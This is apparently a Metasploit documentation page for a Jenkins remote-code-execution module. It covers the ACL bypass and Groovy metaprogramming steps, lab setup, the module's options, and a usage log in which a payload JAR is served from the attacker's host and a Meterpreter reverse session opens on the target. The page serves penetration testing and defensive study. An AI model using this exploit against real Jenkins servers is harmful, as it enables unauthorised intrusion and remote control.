dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md

2.6 KiB
Raw Permalink Blame History

Introduction

This module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file.

When the Java Dropper target is selected, the original entry point based on classLoader.parseClass is used, which requires the use of Groovy metaprogramming to achieve RCE.

When the Unix In-Memory target is selected, a newer, higher-level, and more universal entry point based on GroovyShell.parse is used. This permits the use of in-memory arbitrary command execution.

The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work on later versions of Jenkins.

Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.

Setup

  1. git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
  2. cd cve-2019-1003000-jenkins-rce-poc/sample-vuln
  3. Edit run.sh and change 2.152-alpine to 2.137
  4. ./run.sh

Targets

Id  Name
--  ----
0   Unix In-Memory
1   Java Dropper

Options

RPORT

Set this to the Jenkins port. The default is 8080.

TARGETURI

Set this to the Jenkins base path. The default is /.

SRVPORT

Set this to the port on which to serve the payload. Change it from 8080 to something like 8081 if you are testing Jenkins locally on port 8080.

This option is valid only for the Java Dropper target.

ForceExploit

Set this to true to override the check result during exploitation.

Usage

msf5 exploit(multi/http/jenkins_metaprogramming) > run

[*] Started HTTPS reverse handler on https://192.168.1.2:8443
[*] Jenkins 2.137 detected
[+] Jenkins 2.137 is a supported target
[+] ACL bypass successful
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.2:8081/
[*] Configuring Java Dropper target
[*] Sending Jenkins and Groovy go-go-gadgets
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.pom requested
[-] Sending 404
[*] HEAD /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending 200
[*] GET /CarisaChristiansen/Rank/3.3.5/Rank-3.3.5.jar requested
[+] Sending payload JAR
[*] https://192.168.1.2:8443 handling request from 192.168.1.2; (UUID: qlrpxu6t) Staging java payload (54399 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target

meterpreter > getuid
Server username: jenkins
meterpreter > sysinfo
Computer    : 6f21b8da2915
OS          : Linux 4.9.93-linuxkit-aufs (amd64)
Meterpreter : java/linux
meterpreter >